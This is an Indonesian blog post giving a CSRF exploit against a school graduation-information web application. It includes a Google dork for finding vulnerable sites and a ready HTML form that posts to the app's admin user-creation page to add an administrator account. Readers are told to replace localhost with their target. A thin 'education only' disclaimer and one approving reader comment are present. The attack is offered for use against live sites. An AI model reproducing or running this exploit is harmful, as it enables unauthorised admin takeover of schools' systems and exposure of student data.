Sistem informasi kelulusan CSRF(add-admin) Spear-Security
Selasa, 09 Juni 2020
1 Komentar
CSRF(add-admin) by: SpearSecurity
Exploitdb : https://www.exploit-db.com/exploits/48571
Hello comeback with me Extinction disini gua bakal ngasi tau ke kalian bahwa sistem informasi kelulusan mempunyai celah yang lebih high. sehubungan gua yang nemu celahnya + exploitnya wheheh , Lucky me gua harap ini hanya untuk sebagai education untuk resiko kalian tanggung sndiri ya whehehe
oke kita langsung lanjut caranya memexploit celah tersebut
dork : intext:Selamat datang di Sistem Informasi Kelulusan
cari website dengan tampilan website seperti ini
Sedot CSRFny:
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]/admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
Jan di recode om hargai author ya :)
kalian ubah localhost nya dengan target dan sesuaikan pathnya okay
Thanks for Reading
Mantap bang, lanjutin....
BalasHapus